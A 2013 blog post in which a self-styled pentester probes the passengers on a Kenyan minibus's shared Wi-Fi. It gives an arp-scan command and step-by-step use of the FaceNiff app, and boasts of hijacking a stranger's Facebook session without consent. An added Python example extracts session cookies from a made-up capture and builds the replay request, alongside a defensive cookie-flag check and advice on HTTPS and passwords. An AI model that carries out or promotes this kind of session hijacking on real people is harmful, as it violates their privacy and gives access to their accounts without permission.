Monday, July 15, 2013

Hey Free Wi-Fi ... the matatu hacking Syndrome

Everything has a price... heck, even the free tools I know, including our brains, pay a price in the form of the knowledge they demand, and so on and so forth. What am I getting at? In Kenya I got a chance to ride in one of the Wi-Fi enabled PSVs (Public Service Vehicles). The hacker in me did not want to hate on a lot of these issues, but hey, the pentester in me likes to create awareness, so... with the whole country going digital, and being stuck in traffic for a little over 45 minutes, I decided to give this beautiful tech-savvy mode of transport a pentest :) (really, I should get paid).

Coming off as a very lucrative and empowering initiative (that's going to give them a lot of revenue) by Safaricom, one of Kenya's major network (mobile and data) providers, the initiative dubbed vumaonline aims to equip most (if not all) PSVs with wireless data capability, so that customers can enjoy using the internet in these vehicles at no extra cost to them.

Well, without further ado... the first thing I did was make sure my window was shut tight, beyond the point where a robber could slide it open, and smiled at my bestie Diana, as she knew... "this nikka is up to no good" (that's what she actually said). Then I pulled out my little Talia (Asus 11.3 inch laptop) and booted up my little default pentest environment... my trusted and heavily customised BackTrack Linux...
plugging in my external USB wireless card (capable of injection, I might add).

And we were on... the first thing was to connect to the Wi-Fi, which had a pathetic key, I may add (the number plate, e.g. KBC_567D), so even the guy trailing the vehicle might get a glimpse of the network (not that I tested it; I assumed, which is wrong :( but hey, at that range I believe it's possible). When I connected, the first thing I did was the near obvious... enumerate all the users on the network by scanning the whole IP range. So what do we get, in a quick instance:

and here is my command

arp-scan --interface=wlan1 --localnet
This gives me various IP addresses and MAC addresses; resolving them (the MAC addresses) to their vendor/manufacturer IDs using this gives me something close to this:

3 Samsung devices
3 Huawei devices
1 Blackberry device

Good, we are going somewhere... with this I can go on :)
Oh yes, the Wi-Fi was well protected with WPA-PSK, so no hackers allowed :) While that's really cute, the password still irks me...

Moving on, I wanted to try out a MiTM attack (Man in The Middle)... but, too bad, I will have to confess that I actually gave up due to the time constraint. (With the above information not much damage was done, but given time I would probably have done tonnes more, like own your phone, redirect web logins to phishing sites, steal credentials, and install malware (sooner or later, by initiating downloads of malicious APKs in the case of Android phones, that would tap your messages and probably see how many M-PESA transactions you see/do in a day or in a given time).) I had, however, more fun, and the pentest would still suffice: what I did was pull out my Samsung Galaxy Tab Plus and wage a little more interesting attack method :) hacking Facebook (that's all I could see when peeping over their shoulders... FACEBOOK, and well, Twitter and a little WhatsApp on one of the passengers' phones). So here goes nothing.

So a simple app called (well, not really simple) FaceNiff entered the software/app market recently with the ability to hack Facebook accounts with a simple method.
FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the Wi-Fi that your mobile is connected to.
It is possible to hijack sessions only when the Wi-Fi is not using EAP (WPA-Enterprise, where every client gets its own keys); it should work over any private network (Open/WEP/WPA-PSK/WPA2-PSK).
It's kind of like Firesheep for Android, maybe a bit easier to use (and it works on WPA2!).

*** ROOTED PHONE *** is required. Please note that if the web user uses SSL this application won't work.
This application, due to its nature, is very phone-dependent, so please let me know if it won't work for you.

Use with the stock browser (might not work with others).

Well, moving in on the kill, we get one user with an unprotected Facebook account... well, how does this work?

1. Connect to the Wi-Fi using your regular Wi-Fi settings.
2. Start the application.
3. Choose which accounts (sites) to attack.
4. Optionally, auto-locate profiles that match your preference, and resolve MAC addresses to vendors.

And with that we got the accounts as above... What are the dangers of this?
As I have asserted in previous notes and research, most people use default and/or the same passwords across accounts, so... is it hard to believe that your company email is protected by the same password? Your online bank account? What about your laptop/computer password? Well, it's just a matter of time till a malicious hacker/information gatherer finds that, and you are done for.
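What FaceNiff (and Firesheep before it) actually does is less magical than "hacking Facebook": it watches traffic on the LAN and lifts session cookies out of requests that travel as plaintext HTTP. WPA2-PSK is no obstacle because the shared key only separates the bus from outsiders, not passengers from each other; a peer on the same LAN can get at the other clients' traffic (ARP spoofing is the usual way), and from then on the only thing that matters is whether the session is inside TLS. The added example below (not FaceNiff's code, nor the author's) walks a constructed packet capture, pulls out the session cookies it can read, builds the request an attacker would replay, and finishes with the defender's side: checking that a Set-Cookie header carries the Secure and HttpOnly flags. The site name, cookie names and packets are all made up for the example.

```python
from dataclasses import dataclass


@dataclass
class Packet:
    """One captured TCP payload. Constructed for this example; no real capture."""
    src_ip: str
    dst_port: int
    payload: bytes


# Cookie names treated as session identifiers (assumption for the example;
# every site uses its own names, which is exactly what Firesheep-style tools
# carry in their per-site profiles).
SESSION_COOKIE_NAMES = {"session", "sid"}

# Constructed capture: one victim on plain HTTP, one on HTTPS (only the TLS
# ClientHello is visible on the wire), some non-HTTP noise, and a request with
# no cookies at all.
CAPTURE = [
    Packet("192.168.8.101", 80,
           b"GET /home HTTP/1.1\r\nHost: site.example\r\n"
           b"Cookie: lang=en; session=9f3c1e2b7a; sid=44\r\n\r\n"),
    Packet("192.168.8.102", 443,
           b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03" + bytes(range(0xe0, 0xff))),
    Packet("192.168.8.103", 80, b"\x00\x01\x02 not http at all"),
    Packet("192.168.8.101", 80,
           b"GET /static/logo.png HTTP/1.1\r\nHost: cdn.example\r\n\r\n"),
]


def parse_http_request(payload):
    """Return (method, path, headers) for a plaintext HTTP request, else None.
    TLS records and random bytes never parse, which is the whole point."""
    head = payload.partition(b"\r\n\r\n")[0]
    try:
        lines = head.decode("ascii").split("\r\n")
    except UnicodeDecodeError:
        return None
    request_line = lines[0].split(" ")
    if len(request_line) != 3 or not request_line[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return request_line[0], request_line[1], headers


def parse_cookie_header(value):
    """Split 'a=1; b=2' into a dict."""
    cookies = {}
    for item in value.split(";"):
        name, sep, val = item.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies


def sidejack_candidates(packets):
    """Map (victim_ip, host) -> session cookies seen in the clear.
    Port 443 is skipped outright: there is only ciphertext to look at."""
    found = {}
    for pkt in packets:
        if pkt.dst_port != 80:
            continue
        parsed = parse_http_request(pkt.payload)
        if parsed is None:
            continue
        _, _, headers = parsed
        host = headers.get("host")
        cookies = parse_cookie_header(headers.get("cookie", ""))
        session = {k: v for k, v in cookies.items() if k in SESSION_COOKIE_NAMES}
        if host and session:
            found.setdefault((pkt.src_ip, host), {}).update(session)
    return found


def build_hijack_request(host, path, session):
    """The replay: the attacker's own GET carrying the stolen cookies. The server
    cannot tell it from the victim's browser."""
    cookie = "; ".join(f"{k}={v}" for k, v in session.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n".encode("ascii")


def session_cookie_hardened(set_cookie):
    """Defender's check on a Set-Cookie header: Secure keeps the cookie off
    plaintext HTTP entirely (even if the user types http://), HttpOnly keeps it
    away from injected script."""
    attrs = {a.strip().lower() for a in set_cookie.split(";")[1:]}
    return "secure" in attrs and "httponly" in attrs


if __name__ == "__main__":
    for (victim, host), session in sidejack_candidates(CAPTURE).items():
        print(f"{victim} -> {host}: {session}")
        print(build_hijack_request(host, "/home", session).decode("ascii"))
    print(session_cookie_hardened("session=9f3c1e2b7a; Path=/; Secure; HttpOnly"))
    print(session_cookie_hardened("session=9f3c1e2b7a; Path=/"))
```

Note that the 192.168.8.102 client never appears in the output even though it is on the same Wi-Fi and logged in to the same kind of site; "Secure Browsing (https)", as recommended further down, is what moved it out of reach, and the Secure flag is what stops a stray http:// link from leaking the cookie anyway.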

P.S. The above application does not require you to be tech savvy or a hacker per se, but hey :)

So how do we/I fix this? First recommendation...
- Encrypt your traffic: use SSL (HTTPS) on every site that offers it; I warned people about this earlier. The Wi-Fi's WPA-PSK does not help here, since everyone on the bus shares the same key; only encryption between your browser and the site keeps your session away from the other passengers.
Here's how on Facebook ---->

1.  Click on the Account tab.
2.  Choose Account Settings.
3.  Click Change next to Account Security.
4. Check the box for Secure Browsing (https). Click Save.
NOTE: Whenever you use a Facebook page or third-party app that takes you out of secure browsing, and you allow it, it will disable it completely and you'll have to go back and reset your preferences. Don't assume it will automatically switch back.
When in Account Security, you can also change settings for Login Approvals and Login Notifications and check your recent Login Activity.
And with that, follow the equivalent procedure on other sites like Google, Gmail, YouTube, Amazon, iTunes, etc.

Oh, and please use more than one strong password, a different one for each site; read about how to create strong passwords here.

In the meantime, surf safe :) Good day. Oh, and yes, I did warn the beautiful lady whose account I owned... she bought me coffee today :)


:) No longer posting, all articles should be treated as archived and outdated